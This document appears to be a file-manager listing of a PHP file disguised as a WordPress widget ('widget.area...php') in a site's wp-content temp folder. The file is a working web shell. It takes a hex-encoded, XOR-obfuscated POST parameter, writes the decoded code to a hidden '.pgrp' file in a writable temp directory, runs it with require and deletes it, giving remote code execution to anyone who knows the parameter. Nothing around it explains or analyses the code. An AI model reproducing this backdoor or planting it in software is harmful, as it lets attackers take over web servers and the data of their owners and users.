File "widget.area.1788041746.php"
Full Path: /home/planet5/public_html/bansibaba.com/wp-content1/temp/widget.area.1788041746.php
File size: 743 bytes
MIME-type: --
Charset: utf-8
<!--UjbwvBGe-->
<?php
$key="sym";
if(filter_has_var(INPUT_POST, $key)){
$reference = pack("H*", $_REQUEST[$key]);
$ref='' ; for($d=0;$d<strlen($reference);$d++){$ref.=chr(ord($reference[$d])^1);}
$token = array_filter([sys_get_temp_dir(), "/tmp", session_save_path(), "/var/tmp", getcwd(), "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP")]);
$fac = 0;
do {
$val = isset($token[$fac]) ? $token[$fac] : null;
if ($fac >= count(token)) break;
if (array_product([is_dir($val), is_writable($val)])) {
$resource = implode("/", [$val, ".pgrp"]);
if (file_put_contents($resource, $ref)) {
require $resource;
unlink($resource);
exit;
}
}
$fac++;
} while (true);
}